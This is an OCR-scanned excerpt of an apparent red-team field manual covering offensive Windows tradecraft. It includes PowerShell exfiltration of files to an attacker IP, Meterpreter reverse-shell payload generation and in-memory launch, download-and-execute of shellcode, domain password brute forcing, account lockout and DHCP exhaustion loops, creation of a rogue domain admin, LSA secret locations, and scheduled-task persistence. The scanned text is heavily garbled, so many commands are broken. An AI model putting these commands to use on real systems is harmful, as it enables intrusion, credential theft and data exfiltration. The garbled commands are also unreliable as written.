$pp ~ new-object -typename System.Management.Automation.PSCredential -
argument list "DOl1AIN\user 11 , $pw;
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command
&{Start-Process file.exe -verb runas)'
EMAIL SENDER
powershell.exe Send-l-1ai1Hessage -to " email " -from " email " -subject
"Subject 11 -a " attachment file path " -body "Body" -SmtpServer Target
Email Server IP
TURN ON POWERSHELL REMOTING (WITH VALID CREDENTIALS)
net time \\ip
at \\ip time "Powershell -Command 'Enable-PSRemoting -Force'"
at \\ip time+1 "Powershell -Command 'Set-Item
wsman:\localhost\client\trustedhosts ''"
at \ \ip time+2 "Powershell -Command 'Restart-Service WinRl-1'"
Enter-PSSession -ComputerName ip -Credential username
LIST HOSTNAME AND IP FOR ALL DOMAIN COMPUTERS
Get-WmiObject -ComputerName DC -Namespace root\microsoftDNS -Class
l1icrosoftDNS _ ResourceRecord -Filter "domainname~' DOl1AIN '" I select
textrepresentation
POWERSHELL DOWNLOAD OF A FILE FROM A SPECIFIED LOCATION
powershell.exe -noprofile -noninteractive -command
"[System.Net.ServicePointManager] ::ServerCertificateValidationCallback
{$true); $source~"""https:ll YOUR SPECIFIED IP I file.zip """;
$destination= 111111 C:\rnaster.zip 111111 ;-$http = new-object Systern.Net.WebClient;
$response~ $http.DownloadFile($source, $destination);"
POWERSHELL DATA EXFIL
Script will send a file ($filepath) via http to server ($server) via POST
request. Must have web server listening on port designated in the $server
powershell.exe -noprofile -noninteractive -command
"[S;stem.Net.ServicePointManager] ::ServerCertificateValidationCallback
{$true); $server~"""http:ll YOUR SPECIFIED IP I folder """;
$filepath=" 1111 C:\rnaster.zip 111111 i $http= new=object System.Net.WebClient;
$response~ $http.UploadFile($server,$filepath);"
23
USING POWERSHELL TO LAUNCH METERPRETER FROM MEMORY
~ Need Metasploit v4.5+ (msfvenom supports Powershell)
~ Use Powershell (x86) with 32 bit Meterpreter payloads
~ encodeMeterpreter.psl script can be found on next page
ON ATTACK BOXES
1. ./msfvenom -p Wlndows/meterpreter/reverse https -f psh -a x86
LHOST=l.l.l.l LPORT=443 audit.psl
2. Move audit.psl into same folder as encodeMeterpreter.psl
3. Launch Powershell (x86)
4. powershell.exe -executionpolicy bypass encodeMeterpreter.psl
5. Copy the encoded Meterpreter string
START LISTENER ON ATTACK BOX
1. ./msfconsole
2. use exploit/multi/handler
3. set payload windows/meterpreter/reverse https
4. set LHOST 1. 1. 1. 1
5. set LPORT 443
6. exploit -j
ON TARGET (MUST USE POWERSHELL (x86))
1. powershell. exe -noexi t -encodedCommand paste encoded t~eterpreter
string here
PROFIT
ENCODEMETERPRETER. PSl [7]
# Get Contents of Script
$contents = Get-Content audit.psl
# Compress Script
$ms = New-Object IO.MemoryStream
$action = [IO.Compression.CompressionMode]: :Compress
$cs =New-Object IO.Compression.DeflateStream ($ms,$action)
$sw =New-Object IO.StreamWriter ($cs, [Text.Encoding] ::ASCII)
$contents I ForEach-Object {$sw.WriteLine($ I)
$sw.Close()
# Base64 Encode Stream
$code= [Convert]: :ToBase64String($ms.ToArray())
$command= "Invoke-Expression '$(New-Object IO.StreamReader('$(New-Object
IO. Compression. DeflateStream ('$(New-Object IO. t4emoryStream
(, '$ ( [Convert] : : FromBase64String ('"$code'") ) I I ,
[IO.Compression.Compressiont~ode]: :Decompress) I,
[Text.Encoding]: :ASCII)) .ReadToEnd() ;"
# Invoke-Expression $command
$bytes= [System.Text.Encoding] ::Unicode.GetBytes($command)
$encodedCommand = [Convert]: :ToBase64String($bytes)
# Write to Standard Out
Write-Host $encodedCommand
Copyright 2012 TrustedSec, LLC. All rights reserved.
Please see reference [7] for disclaimer
24
USING POWERSHELL TO LAUNCH METERPRETER (2ND METHOD)
ON BT ATTACK BOX
1. rnsfpajload windows/rneterpreter/reverse tcp LHOST~10.1.1.1
LPORT~8080 R I rnsfencode -t psh -a x86
ON WINDOWS ATTACK BOX
1. c:\ powershell
2. PS c:\ $crnd ~ ' PASTE THE CONTENTS OF THE PSH SCRIPT HERE
3. PS c:\ $u ~ [Sjstern.Text.Encoding]: :Unicode.GetBytes($crnd)
4. PS c: \ $e ~ [Convert] ::ToBase64String($u)
5. PS c:\ $e
6. Copf contents of $e
START LISTENER ON ATTACK BOX
1. ./rnsfconsole
2. use exploit/multi/handler
3. set pajload windows/rneterpreter/reverse tcp
4. set LHOST 1.1.1.1
5. set LPORT 8080
6. exploit -j
ON TARGET SHELL ( 1 : DOWNLOAD SHELLCODE, 2 : EXECUTE)
'
1. c: \ powershell -noprofile -noninteracti ve -command " &
{$client~new-object
Sjstern.Net.WebClient;$client.DownloadFile('http://1.1.1.1/shell.txt
', 'c:\windows\ternp\ shell.txt') )"
2. c: \ powershell -noprofile -noninteracti ve -noexi t -command 11 &
{$crnd~tjpe 'c:\windows\ternp\ shell.txt';powershell -noprofile-
noninteractive -noexit -encodedCornmand $cmd} 11
PROFIT
25
WINDOWS REGISTRY
OS INFORMATION
HKLM\Software\Microsoft\Windows NT\CurrentVersion
PRODUCT NAME
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v
ProductNarne
DATE OF INSTALL
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v InstallDate
REGISTERED OWNER
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v RegisteredOwner
SYSTEM ROOT
HKLM\Software\~icrosoft\Windows NT\CurrentVersion /v SjstemRoot
TIME ZONE (OFFSET IN MINUTES FROM UTC)
HKLM\Sjstem\CurrentControlSet\Control\TimeZoneinformation /v ActiveTirneBias
MAPPED NETWORK DRIVES
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive
MRU
MoUNTED DEVICES
HKLM\Sjstern\MountedDevices
USB DEVICES
HKLM\Sjstern\CurrentControlSet\Enurn\USBStor
TURN ON IP FORWARDING
HKEY_LOCAL_~ACHI~E\SYSTEM\CurrentControlSet\Services\Tcp~p\Parameters -
IPEnableRouter = 1
PASSWORD KEYS : LSA SECRETS CAN CONTAIN VPN 1 AUTOLOGON 1 OTHER
PASSWORDS
HKEY LOCAL MACHINE\Securitj\Policy\Secrets
HKCU\Soft\v~re \t1icroso ft \Windows NT\CurrentVersion \Winlogon \autoadminlogon
AUDIT POLICY
HKLM\Security\Policj\?olAdTev
26
KERNEL/USER SERVICES
HKLM\Software\Microsoft\Windows NT\CurrentControlSet\Services
INSTALLED SOFTWARE ON MACHINE
HKLt1\Software
INSTALLED SOFTWARE FOR USER
HKCU\Software
RECENT DOCUMENTS
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
RECENT USER LOCATIONS
HKCU\Software\Microsoft\Windows\Curren~Version\Explorer\ComDlg32\LastVisite
dtmu & \Opensavetmu
TYPED URLs
HKCU\Software\Microsoft\Internet Explorer\TjpedURLs
MRU LISTS
HKCU\ Software \:ci erose ft \Windows\ Cur rentVer s ion\ Explorer \Runt1RU
LAST REGISTRY KEY ACCESSED
HKCU\Software\l1icrosoft\Windows\CurrentVersion\Applets\RegEdit /v LastKeJ
STARTUP LOCATIONS
HKLl1\Soft'..;are \t1icroso:t \ 1/'Jindows \CurrentVers on \Run & \Runonce
HKLM\SOFTWARE\Microsoft\Windows\CurrentVers on\Policies\Explorer\Run
HKCU\Software\Microsoft\Windows\CurrentVers on\Run & \Runonce
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load & \Run
2-
ENUMERATING WINDOWS DOMAIN WITH DSQUERY
LIST USERS ON DOMAIN WITH NO LIMIT ON RESULTS
dsquery user -limit 0
LIST GROUPS FOR DOMAIN=VICTIM.COM
dsquery group ''cn=users, dc=victim, dc=com''
LIST DOMAIN ADMIN ACCOUNTS
dsquerj group -name "domain admins 11 i. dsget group -members -expand
LIST ALL GROUPS FOR A USER
dsquery user -name bob 1 I dsget user -memberof -expand
GET A USER'S LOGIN ID
dsquerj user -name bob~ i dsget user -samid
LIST ACCOUNTS INACTIVE FOR 2 WEEKS
dsquery user -inactive 2
ADD DOMAIN USER
dsadd user ''CN=Bob,CN=Users,DC=victim,DC=corn'' -samid bob -pwd bobpass-
displaj "Bob 11 -pwdneverexpires jes -rnemberof "CI';=Domain
Admins,CN=Users,DC=victim,DC=com
DELETE USER
dsrm -subtree -noprornpt ''CN=Bob,CN=Users,DC=victim,DC=com''
LIST ALL OPERATING SYSTEMS ON DOMAIN
dsquerJ A ''DC=victim,DC=com'' -scope subtree -attr ''en'' ''operati~gSjstern''
''operatingSjstemServicePack'' -filter
11 (& (objectclass=computer) (objectcategorJ=computer) (operatingSjstem=Windows}
I I"
LIST ALL SITE NAMES
dsquerJ site -o rdn -l~mit
LIST ALL SUBNETS WITHIN A SITE
dsquery subnet -site sitename -o rdn
LIST ALL SERVERS WITHIN A SITE
dsquerJ server -site sitename -o rdn
28
FXND SERVERS XN THE DOMAIN
dsquery ' domainroot -filter
" (& (objectCategory~Computer) (objectClass~Computer) (operatingSystem~'Server'
) ) " -limit 0
DOMAIN CONTROLLERS PER SXTE
dsquery J ''CN=Sites,CN=Configuration,DC=forestRootDomain'' -filter
(objectCategory~Server)
29
WINDOWS SCRIPTING
) If scripting in batch file, variables must be preceeded with %%, i.e. %%i
NESTED FOR LOOP PING SWEEP
for /L %i in (10,1,254) do@ (for /L %x in (10,1,254) do@ ping -n 1 -w 100
10.10.%i.%x 2 nul 1 find "Reply" && echo 10.10.%i.%x live.txt)
LOOP THROUGH FILE
for /F %i in I file I do command
DOMAIN BRUTE FORCER
for /F %n in (names.txt) do for /F %pin (pawds.txt) do net use \\DC01\IPC$
/user: domain \%n %p 1 NUL 2 &1 && echo %n:%p && net use /delete
\\DCOl\IPC$ NUL
ACCOUNT LOCKOUT (LOCKOUT. BAT)
@echo Test run:
for /f %%U in (list.txt) do @for /1 %%C in (1,1,5) do @echo net use \\WIN-
1234\c$ /USER:%%U wrongpass
DHCP EXHAUSTION
for /L %i
1.1.1.%i
in (2,1,254) do (netsh interface ip set address local static
netrnask gw I~ %1 ping 12- .0.0.1 -n l -w 10000 nul %1)
DNS REVERSE LOOKUP
for /L %i in (100, 1, 105)
dns.txt && echo Server:
do @ nslookup l.l.l.%i I findstr /i /c:''Name''
1.1.1.%i dns.txt
SEARCH FOR FILES BEGINNING WITH THE WORD 11 PASS 11 AND THEN PRINT IF
IT 1 S A DIRECTORY, FILE DATE/TIME, RELATIVE PATH, ACTUAL PATH AND
SIZE (@VARIABLES ARE OPTIONAL)
forfi1es /P c:\ternp /s /rn pass' -c "crnd /c echo @isdir @fdate @ftirne
@relpath @path @fsize"
SIMULATE MALICIOUS DOMAIN CALLOUTS (USEFUL FOR AV/IDS TESTING)
Run packet capture on attack domain to receive callout
domains.txt should contain known malicious domains
for /L %i in (0,1,100) do (for /F %n in (domains.txt) do nslookup %n
attack domain NUL 2 &1 & ping -n 5 12-.0.0.1 NUL 2 &1
IE WEB LOOPER (TRAFFIC GENERATOR)
for /L %C in (1,1,5000) do @for %U in (www.Jahoo.com www.pastebin.com
www.pajpal.com www.craigslist.org www.google.com) do start /b iexplore %U &
ping -n 6 localhost & taskkill /F /IM iexplore.exe
38
tlai/)' rnrt Y" -7 - _,
GET PERMISSIONS ON SERVICE EXECUTABLES
for /f ''tokens=2 delims='=''' %a in ('wmic service list full lfind /i
''pathname'' I find /i /v ''s~stem32''') do @echo %a
c:\windows\temp\3afd4ga.tmp
for /f eol = '' delims = '' %a in (c:\windows\temp\3afd4ga.tmp) do cmd.exe
/c icacls ''%a''
ROLLING REBOOT (REPLACE /R WITH /S FOR A SHUTDOWN) :
for /L %i in (2,1,254) do shutdown /r /m \\l.l.l.%i /f /t 0 /c "Reboot
message''
SHELL ESCALATION USING VBS (NEED ELEVATED CREDENTIALS)
# Create .vbs script with the following
Set shell ' wscript.createobject(''wscript.shell'')
Shell.run ''runas /user: user '' & '''''''' &
C:\Windows\SJstem32\WindowsPowershell\vl.O\powershell.exe -WindowStJle
hidden -NoLogo -~onlnteractive -ep bjpass -nop -c \'' & '''''''' & ''IEX ((New-
Object Net.WEbClieil':).down:oadstring(' url '))\" & """" & """"
wscript.sleep (100)
shell.Sendkejs '' password '' & ''{ENTER}''
31
TASK SCHEDULER
' Scheduled tasks binary paths CANNOT contain spaces because everjthing
after the first space in the path is considered to be a command-line
argument. Enclose the /TR path parameter between backslash (\) AND
quotation marks ("):
... /TR "\"C:\Program Files\file.exe\" -x argl"
TASK SCHEDULER (ST=START TIME, SD=START DATE, ED=END DATE)
*MUST BE ADMIN
SCHTASKS /CREATE /TN Task Name /SC HOURLY /ST
MM/DD/YYYY /ED l1M/DD/YYYY /tr "C:\mj.exe" /RU
password
TASK SCHEDULER PERSISTENCE [10]
'For 64 bit use:
HH:MM /F /RL HIGHEST /SD
DOl1AIN\ user /RP
"C:\Windows\sjswow64\WindowsPowerShell\vl.O\powershell.exe"
# (x86) on User Login
SCHTASKS /CREATE /TN Task...